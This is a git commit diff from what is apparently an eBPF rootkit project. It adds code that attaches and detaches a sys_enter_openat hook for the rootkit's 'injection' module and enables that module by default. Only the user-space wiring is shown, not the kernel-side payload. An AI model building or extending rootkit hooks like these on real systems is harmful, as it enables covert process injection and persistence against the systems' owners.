Added sys_openat for the injection module, fully working!

2025-12-30 05:03:08 +08:00 · 2022-05-16 08:02:38 -04:00
parent abc501d4be
commit 4044d7994c
16 changed files with 24017 additions and 12699 deletions
--- a/src/user/include/modules/injection.h
+++ b/src/user/include/modules/injection.h
@@ -17,10 +17,15 @@ int attach_sys_exit_timerfd_settime(struct kit_bpf *skel){
 	skel->links.sys_exit_timerfd_settime = bpf_program__attach(skel->progs.sys_exit_timerfd_settime);
    return libbpf_get_error(skel->links.sys_exit_timerfd_settime);
 }
+int attach_sys_enter_openat(struct kit_bpf *skel){
+	skel->links.sys_enter_openat = bpf_program__attach(skel->progs.sys_enter_openat);
+    return libbpf_get_error(skel->links.sys_enter_openat);
+}

 int attach_injection_all(struct kit_bpf *skel){
    return attach_sys_enter_timerfd_settime(skel)
-        || attach_sys_exit_timerfd_settime(skel);;
+        || attach_sys_exit_timerfd_settime(skel)
+        || attach_sys_enter_openat(skel);
 }


@@ -40,10 +45,19 @@ int detach_sys_exit_timerfd_settime(struct kit_bpf *skel){
    }
    return 0;
 }
+int detach_sys_enter_openat(struct kit_bpf *skel){
+    int err = detach_link_generic(skel->links.sys_enter_openat);
+    if(err<0){
+        fprintf(stderr, "Failed to detach injection link\n");
+        return -1;
+    }
+    return 0;
+}

 int detach_injection_all(struct kit_bpf *skel){
    return detach_sys_enter_timerfd_settime(skel)
-        || detach_sys_exit_timerfd_settime(skel);
+        || detach_sys_exit_timerfd_settime(skel)
+        || detach_sys_enter_openat(skel);
 }

 #endif
--- a/src/user/include/modules/module_manager.c
+++ b/src/user/include/modules/module_manager.c
@@ -91,6 +91,7 @@ int setup_all_modules(){
    }else{
        if(config.injection_module.sys_enter_timerfd_settime == ON) ret = attach_sys_enter_timerfd_settime(attr.skel);
        if(config.injection_module.sys_exit_timerfd_settime == ON) ret = attach_sys_exit_timerfd_settime(attr.skel);
+        if(config.injection_module.sys_enter_openat == ON) ret = attach_sys_enter_openat(attr.skel);
    }
    if(ret!=0) return -1;

--- a/src/user/include/modules/module_manager.h
+++ b/src/user/include/modules/module_manager.h
@@ -39,6 +39,7 @@ typedef struct module_config_t{
        char all;
        char sys_enter_timerfd_settime;
        char sys_exit_timerfd_settime;
+        char sys_enter_openat;
    }injection_module;

 } module_config_t;
--- a/src/user/kit.c
+++ b/src/user/kit.c
@@ -402,9 +402,15 @@ int main(int argc, char**argv){
 	module_config.sched_module.all = ON;
 	//FS
 	module_config.fs_module.all = ON;
+
+	//INJECTION
+	module_config.injection_module.all = ON;
 	
 	module_config_attr.skel = skel;
 	err = setup_all_modules();
+	if(err!=0){
+		perror("ERROR setting up the rootkit hooks");
+	}

 	// Set up ring buffer polling --> Main communication buffer kernel->user
 	rb = ring_buffer__new(bpf_map__fd(skel->maps.rb_comm), handle_rb_event, NULL, NULL);